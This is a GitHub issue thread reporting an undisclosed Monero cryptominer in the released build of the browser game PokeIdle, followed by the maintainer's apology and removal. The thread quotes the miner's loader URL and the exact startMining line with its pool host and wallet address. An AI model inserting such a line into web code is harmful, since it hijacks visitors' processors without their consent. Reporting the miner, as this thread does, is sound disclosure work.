### ISSUE TITLE
Remove Cryptominer

### ISSUE THREAD

**Issue by Takeces** [JoshuaPaulBarnard/PokeIdle#3]
Hey, it would be relly nice if you could remove the cryptominer that can be found in the released version of the game.
It loads a script 'webmr.js' from 'https://webminerpool.com/webmr.js'.
The main.js then starts the mining in it's last line: `startMining("moneroocean.stream","44JcpcJKTZTeSKwVtbeu5WgvHY6Teg7q7JVKgnyLWtebNDR7hV5WqzfNgn444eNBGAg8bcvcmcWvwf5VF4wYhX2vGJjdg7M");throttleMiner=80;`
Nothing of this can be found in the repository itself. I think it is some kind of release-process-issue.

**Comment by DanielRX** [comment]
If its not in the repo, then its in your browser.

Can you provide the source / screenshot of your console?

**Comment by JoshuaPaulBarnard** [comment]
miner has been removed and issue has been resolved.

**Comment by JoshuaPaulBarnard** [comment]
I just made this response on reddit about this:
Hey guys, sorry about the webminer on the website. I'm studying web development right now and found out about them and was playing around with them last night to see how they work, what they do. I'm thinking of using them to monetize some of my other sits, but this is the project i'm working on now. Anyways, I uploaded the wrong files last night. I know it sounds totally lame :-P

so yeah, sorry about that, its been removed.

ps. if i ever do add monitization such as with a miner, i'd rather go with one like coinhive that lets people opt-in/out.
https://www.reddit.com/r/incremental_games/comments/84lnsa/im_starting_to_help_develop_pok%C3%A9idle_and_i_am/

**Comment by JoshuaPaulBarnard** [comment]
I just made this response on reddit about this:
Hey guys, sorry about the webminer on the website. I'm studying web development right now and found out about them and was playing around with them last night to see how they work, what they do. I'm thinking of using them to monetize some of my other sits, but this is the project i'm working on now. Anyways, I uploaded the wrong files last night. I know it sounds totally lame :-P

so yeah, sorry about that, its been removed.

ps. if i ever do add monitization such as with a miner, i'd rather go with one like coinhive that lets people opt-in/out.
https://www.reddit.com/r/incremental_games/comments/84lnsa/im_starting_to_help_develop_pok%C3%A9idle_and_i_am/
